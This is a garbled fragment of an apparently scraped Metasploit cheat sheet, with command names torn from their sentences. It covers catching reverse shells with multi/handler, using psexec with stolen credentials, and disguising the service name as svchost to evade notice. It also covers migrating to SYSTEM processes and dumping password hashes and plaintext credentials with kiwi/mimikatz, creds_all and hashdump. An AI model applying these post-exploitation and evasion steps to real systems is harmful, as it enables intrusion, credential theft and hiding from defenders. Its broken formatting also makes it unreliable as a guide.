exploit/multi/handler
to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.exploit/windows/smb/psexec
module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the SERVICE_FILENAME
option to remove the random garbage used, because its suspicious (using something like svchost
helps hide!).sessions -l
command. Channels inside of sessions are managed with channels -l
command. Upgrade existing shells with the sessions -u 1
command.CTRL-Z
will background a channel or sessionuse [module name]
SYSTEM
, and we need to make sure the process we're in is the same architecture as the host.sysinfo
. Check the Architecture
and Meterpreter
info to make sure they match. If we need to move, check which running processes have the correct arch and are running as SYSTEM
also with ps -A x64 -s
, then we can move with migrate [PID]
. Validate the arch and meterpreter types match with sysinfo
again.load kiwi
. Running help
will show our new mimikatz commands we can use. Using creds_all
will dump all available hashes and plaintext passwords!help
sysinfo
shell
getpid
getuid
ps
migrate
cd
/ lcd
ls
/ lls
download
upload
edit
ipconfig
route
portfwd
creds_all
hashdump
run hashdump
run post/windows/gather/smart_hashdump
msfconsole
msfd
msfrpcd
msfcli
msfvenom
auxiliary
encoders
exploits
nops
payloads
post
~/.msf4/logs/framework.log